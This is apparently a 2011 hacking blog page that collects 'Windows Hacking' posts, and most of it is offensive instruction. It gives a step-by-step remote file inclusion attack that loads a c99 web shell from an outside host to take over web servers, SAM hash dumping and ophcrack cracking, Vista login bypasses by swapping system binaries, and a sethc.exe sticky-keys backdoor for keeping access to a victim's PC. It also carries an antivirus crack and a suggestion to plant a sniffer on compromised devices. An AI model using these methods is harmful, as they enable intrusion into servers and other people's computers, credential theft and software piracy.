Showing posts with label Windows Hacking. Show all posts
Showing posts with label Windows Hacking. Show all posts

Thursday, May 26, 2011

QUICK HEAL TOTAL SECURITY 2011 CRACK - DOWNLOAD

Features Enabled
 
1)Online Registration
2)Automatic Updates
3)PC Tuner Running 

Follow These simple Instructions:
1)download quick heal total security trial version download here.
 
2)Start ur computer in safe mode
 
3)copy ol 3 file which u will dload frm d link & paste dem into(c:\program files\quick heal\quick heal total security ) replace dem with existing one.
 
1. scanbt.dll
 
2. infori.dll 
 
3. scanner.exenow
 
4th file l to (c:\prog files\quick heal\quick heal total security\PC tuner)
 
4. pctres.dll
 
Here's The Link To The File:

Thursday, May 19, 2011

CRACKING WINDOWS PASSWORDS - HOW TO

To crack Windows XP and Windows Vista passwords, we will use the program called ophcrack. Ophcrack is a Windows only password cracker, and it uses rainbow tables to get the job done quickly. It cracks passwords for both Windows XP and Vista but it is more powerful on XP because Vista fixed the security hole that allowed XP to crack passwords easily. Windows uses a couple a couple types of hashes. One of them is the LM (Lan Manager) hash. If a password is longer than seven characters, then it is split into seven character chunks, made into all uppercase, and then hashed with the DES encryption. Because it is split into parts and made all uppercase, the total number of different password combinations goes down significantly, and makes it easier for hackers to crack the password. The Windows password hashes are stored in a couple places:
• In the C:\WINDOWS\system32\config directory where it is locked to all accounts but the system account which you don’t have access to.
• In the registry: HKEY_LOCAL_MACHINESAM where it is also locked for all users.
So you might be wondering, how can I get a copy of those hashes? There are a couple ways.
• Boot from a Linux live CD and copy the SAM file onto a USB or floppy disk.
• Use the PWDUMP program that comes with ophcrack to trick the registry into giving up the hashes.
1. First download and install ophcrack. As you can see there are two versions. In this example we will be using the program itself in windows, so download the first option.


2. Once you have it downloaded, install it. When the option comes up to download rainbow tables, unclick them all and just install the program. It is better to download the rainbow tables separately.



3. Once it is installed, go to the ophcrack website and click on Tables in the navigation. This will display all the tables you can download. As you can see, the more characters covered, the bigger the table gets. Choose the correct table for your operating system.




4. In the example, I chose the largest possible free table. Next run ophcrack and click on tables. Select the table you downloaded and click Install to locate the file on your computer. Hit OK to continue.



5. Next we will be running PWDUMP to obtain the password hashes. Make sure all of your anti-virus and anti-spyware programs are disabled because most anti-virus programs mistake PWDUMP for a malicious program since it accesses the system files. If you don’t disable the anti-virus program PWDUMP will fail in retrieving the hashes.

6. Click Load and select Local SAM. This will load all the password hashes for all the users on your computer and display them.



7. Next click Crack and the program will begin to crack the password hashes.

8. Once the program finishes cracking, you should see a screen similar to the following:




9. As you can see, two out of three of my account passwords were cracked in a matter of a couple minutes.
• Bob : lolcats
• David M: not found
• Pushkin: Christmas02

Ophcrack LiveCD

The next method to crack the Windows hashes I will show you is through an ophcrack LiveCD.
Ophcrack LiveCD
1. Go to the ophcrack website and choose the correct operating system LiveCD to download.
2. With the downloaded .ISO, create a LiveCD the same way you did with the Ubuntu LiveCD in the Linux chapter.
3. Put the CD in your CD-Drive and restart to boot from the CD.
4. You will see the following screen:



5. Hit <ENTER> or wait six seconds to boot into the Ophcrack Graphic mode. If something goes wrong and the screen won’t show the Graphics, restart and go into the Ophcrack Graphic VESA mode. If this also fails, go into Ophcrack Text mode.

6. Once it ophcrack loads completely, it will automatically get your Windows password hashes and begin the cracking process.

Wednesday, May 18, 2011

CHANGE ANY USER PASSWORD IN WINDOWS

It enables the user to re-password any account without having to know the existing password and also shows you every account that exists on the machine (even the ones that are hidden).
To view all of the user accounts:

1) While logged onto the computer, click on Start>Run>and type in CMD.
2) From the command prompt window, type in net users. This will show you every account that is made onto the computer whether it is hidden or not.
To change an account password:

1) While logged onto the computer to an account that has administrative rights, click on Start>Run>and type in CMD.
2) Type in net user then the name of the account then * and press enter. heres an example: net user administrator * or net user "Joe Smith" * . Put the name in quotes if it contains spaces.
3) From there it should ask for a new password. Type in your new password (type very carefully - the command window won't display what you type) and once more to confirm it. If you get the message that the command succeeded successfully you're all set!!!

CAIN & ABEL V4.9.39 - PASSWORD RECOVERY TOOLS FOR WINDOWS

Cain & abel is a password recovery tool for Microsoft Operating Systems.It allows easy recovery of various kind of passwords by sniffing the network,carcking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks,recording VoIP Conversations,decoding scrambled passwords,recovering wireless network keys,revealing passwords boxes,uncovering cached passwords and analyzing routing protocols.
Features:
  • Proxy support for Cain's Certificate Collector.
  • The ability to specify custo, proxy authentication credentials for Certificate Collector.
  • Proxy HTTPS Man-in-the-Middle Sniffer (TCP port 8080).
  • HTTP,APR-HTTPS and APR-ProxyHTTPS sniffer filters are now separated.
  • OpenSSL library upgrade to version 0.9.8q
  • winpcap library upgarde to version 4.1.2
Download from here: Download

RAWCAP - A COMMAND LINE NETWORK SNIFFER FOR WINDOWS

RawCap is a free command line network sniffer for Windows that users raw sockets. This means that you wont need external drivers such as WinPcap anymore! It can also sniff WiFi networks! All
this in a file that is just 17kb.

You might ask what good this might do to me. The answer is simple. If you find a way to compromise a perimeter devices running Windows, you can upload this small utility there and then view the dump file at your own leisure to sniff their internal traffic! Since it works at the raw sockets, you can sniff anything - right from a SSL connection to WPA2 encrypted WiFi conection. This can helpful to incident responders and penetration testers at the same time.
  • Features of RawCap:
  • Can sniff any interface that has got an IP address, including 127.0.0.1 (localhost/loopback)
  • RawCap.exe is just 17 kB
  • No external libraries or DLL’s needed other than .NET Framework 2.0
  • No installation required, just download RawCap.exe and sniff
  • Can sniff most interface types, including WiFi and PPP interfaces
  • Minimal memory and CPU load
  • Reliable and simple to use
You will need to have administrator privileges to run RawCap. Additionally, it might not run on a Windows 7 or Windows Vista machine.

or simply run
 
RawCap.exe 192.168.0.17 dumpfile.pcap

This tool has been currently tested on Windows XP.

Download RawCap from here: Download

Tuesday, May 17, 2011

HOW TO REMOTELY SHUTDOWN COMPUTER USING MOBILE PHONE

Sometimes we face the situations when we do not get time to shutdown our computer in hurry. But it can cause some serious risks to your privacy, important data or just the high electricity bill. Well, for whatever reason if you want to shutdown your computer from a distant place then here is a trick for that. All you need for that is your mobile phone.

The video given will show you that how you can shutdown your computer from anywhere using a mobile phone, Microsoft Outlook installed on your computer and by creating a free account at www.Kwiry.com

HOW TO : Remotely Shutdown Computer Using Mobile Phone



RFI - REMOTE FILE INCLUSION - SIMPLE WEBSITE HACKING TECHNIQUE EXPLAINED

There are many servers that are affected to this kind of hacks because the PHP’s settings of register_globals and allow_url_fopen  are being enabled. PHP 6.0, register_globals has been removed, but also many websites still rely on older versions of PHP. Now I will give you steps that hackers take to exploit this kind of vulnerability. 
1. First the hacker would find a website that’s get pages via the PHP include() function and is vulnerable to RFI. We will use Google dorks(See the meaning section to know about Google dorks) to locate servers vulnerable to RFI. 

2. The Website should have its address similar to the below link:
http://vulnerablesite.com/index.php?page=PageName

3. Now at the PageName section we will but the address of a website it will look similar to the following:
http://vulnerablesite.com/index.php?page=http://google.com

4. Here we have put Google web address and after proceeding if the Google homepage shows up on the website, then we will know that it is Vulnerable to RFI and we will be ready to include the shell. 
5. The popular shell is c99.r57 shell is also popular but I will discuss about c99 shell here.  We will use Google dork to find the c99 shell here. To find the shell using Google dork we should search inurl: c99.txt in Google.
This will display websites with that shell. NOTE: In the end of the URL add ?(Question mark sign)


So the New URL would look like this :
http://vulnerablesite.com/index.php?page=http://site.com/c99.txt?
6. Sometimes on the script i.e. in PHP the server appends “.php” and end of the included file. So if you include the c99 shell, it would look like this “c99.txt.php” and that will not work. So to fix it, you should  you should add a null byte i.e. to the end of c99.txt. tells the server to ignore everything that is there after c99.txt. 
7. To search for the RFI vulnerable site you should search allinurl:.php?page= in Google. This search will look for URL’s with .php?page=. You most likely won’t find any vulnerable sites with that search so you can even search switching around the word “page” with other similar words. We can even search in vulnerability databases like www.osvdb.org for already discovered RFI vulnerabilities that are running that vulnerable web application with a Google dork.

8. If you get successful with this attack then you will get a big shell screen.
It will display all the info’s about the server like files and directories on it. From here you can find a directory that both read and write privileges and upload the shell but there will be .php file so that vulnerability in the website will be fixed already fixed, and you can be able to access them later.
9. Now you should find a way to gain root privileges on the server. You can do this by uploading and running local exploits . You should also search the targets server for configuration. It may contain username and passwords for the databases and other private information.

To protect yourself from RFI attacks, disable register_globals and allow_url_fopen from your php.ini file and always use Updated scripts simply make sure you are using up-to-date scripts, and make sure you server php.ini file has disabled.
Important Meanings
Shell - a graphical interface that let you to browse remote file and for running your own made code.
Google Dork - Google dork the process of taking advantages of Google Search to get specific search result.

Sunday, May 15, 2011

HOW TO OPTIMIZE BROADBAND & DSL CONNECTIONS SPEED

These settings allow you to boost the speed of your broadband Internet connection when using a Cable Modem or DSL Router with Windows 2000 and Windows XP.

Open your registry and find the key below.

Create the following DWORD values, as most of these values will not already exist you will need to create them by clicking on 'Edit -> New -> DWORD Value' and then set the value as shown below.

DefaultTTL = "80" hex (or 128 decimal)
Specifies the default time to live (TTL) for TCP/IP packets. The default is 32.

EnablePMTUBHDetect = "0"
Specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. The default is 0.

EnablePMTUDiscovery = "1"
Specifies whether the TCP/IP stack will attempt to perform path MTU discovery as specified in RFC 1191. The default is 1.

GlobalMaxTcpWindowSize = "7FFF" hex (or 32767 decimal)
Specifies the system maximum receive window size advertised by the TCP/IP stack.

TcpMaxDupAcks = "2"
Determines the number of duplicate ACKs that must be received for the same sequence number of sent data before "fast retransmit" is triggered.

SackOpts = "1"
Enables support for selective acknowledgements as documented by Request for Comment (RFC) 2018. Default is 0.

Tcp1323Opts = "1"
Controls RFC 1323 time stamps and window scaling options. Possible values are: "0" = disable RFC 1323 options, "1" = window scale enabled only, "2" = time stamps enabled only and "3" = both options enabled.

TcpWindowSize = "7FFF" hex (or 32767 decimal)
Specifies the receive window size advertised by the TCP/IP stack. If you have a latent network you can try increasing the value to 93440, 186880, or 372300.

Exit your registry and restart Windows for the changes to take effect.

If you don’t want to edit the registry, here's a little TCP utility that is ideal...

Saturday, May 14, 2011

HOW TO CRACK PASSWORDS IN WINDOWS VISTA

Boot to Win RE
Click Command Prompt option..then type the following command:
C:
CD Windows\system32
ren cmd.exe cmd.old
ren magnify.exe cmd.exe
ren cmd.old magnify.exe
Then Restart your computer
Click on the Easy of the Access centre on the left side bottom à Choose Magnify option à then.. Command prompt opens up
Type: net user administrator /active:yes
Restart the computer
Login on the administrator account and then using User Account page remove the password for the other account.
Search for Magnify.exe in start search and then click on it
Command prompt opens up!
Type: net user administrator /active:no
Restart the computer again!
This will disable the administrator account.
Boot to winRE
Type the following:
C:
CD Windows\system32
ren magnify.exe cmd.old
ren cmd.exe magnify.exe
ren cmd.old cmd.exe
exit
Restart the computer and then the system logs on to the User account without asking for the password provided there is only one user account.

SETTING BACKDOOR IN WINDOWS - COMMAND PROMPT ON WINDOWS SCREEN

Lets assume that you have just cracked victim's windows password.  or simply got access to his windows for 
some time.Can you make some changes in windows so that you could access the windows again even if victim changes the password ?? or Can you make any changes in your own windows so that you could access it anytime even if anybody sets/changes password ?
Simply Can we set a backdoor in windows ?
Yes we can :) .
Backdoor actually means maintaining access.
okay lets do one thing first. Open your command prompt (run as administrator in win 7/vista).

Type the following command :

Syntax : net user account.name *
Example: net user administrator *
and hit enter. Set any password for that account.

Hopefully your new password must have been set. did you notice one thing ? It didn't ask you to confirm old password. Now suppose if anyhow we manage to access command prompt at logon screen (without logging in), we can easily change/clear password.  
Okay lets move on.
Now press shift key five times and you must have got a dialog box "sticky keys" on screen.


Sticky keys is a feature that makes it easy for users who have physical  disablilities to press multiple keys at time.   This is the only feature which can be used before logging in at logon screen ( as per my knowledge). I repeat this feature can be used at  logon screen by pressing shift key five times.
Whenevr we start an application like paint, we are actually running mspaint.exe placed inC:\windows\system32. or command prompt, we are running cmd.exe placed in system32 directory, similary
When we press shift key 5 times or use sticky keys feature, system actually starts the executable file
sethc.exe placed in system32 directory. This means if we rename cmd.exe to sethc.exe and press shift 5 times, system would again start sethc.exe but instead of sticky keys the command prompt will be opened.
But you just cant simply rename it or change system32 files. Follow the tutorial for that.
 
Tutorial :

* Go to C:\windows\system32
* Copy cmd.exe on your desktop and rename it to sethc.exe .
*Now copy that file and paste again in system32 directory.

@ Windows XP Users


Hopefully existing orignal sethc.exe must have been replaced and your job is done. Now press shift five times and you would see command prompt on screen.You can access command prompt at windows logon screen and change/clear the password easily using "net user" command.

Note: You can also do these changes while using windows Guest Account. But when you would access command prompt at logon screen, you can change/clear password even of administrator's account. This is exactly how , we can hack into administrator's account through guest account.

@ Windows vista/7 Users

You must have got a pop up box saying "Access Denied".

Actually you can not change system32 directory files until you do not have the permissions. You can not have the permissions until you do not have the ownership. So lets take ownership, change permissions, just follow the steps.

1. Right click on sethc.exe and run as administrator.  Again right click on sethc.exe, open properties.
Click on Advanced tab , then on owner and click edit, change the owner from "trusted installer" to "administrator" and click apply.





2. Then click on 'Edit' in security tab to edit permissions. Click on 'Administrators' , give it full control
and apply changes.


Okay its done now.

Now try replacing the orignal sethc.exe with our sethc.exe (got by renaming cmd.exe).
Press shift key five times and hopefully you would get command prompt on the screen instead of sticky keys.

Enjoy Command prompt at logon screen...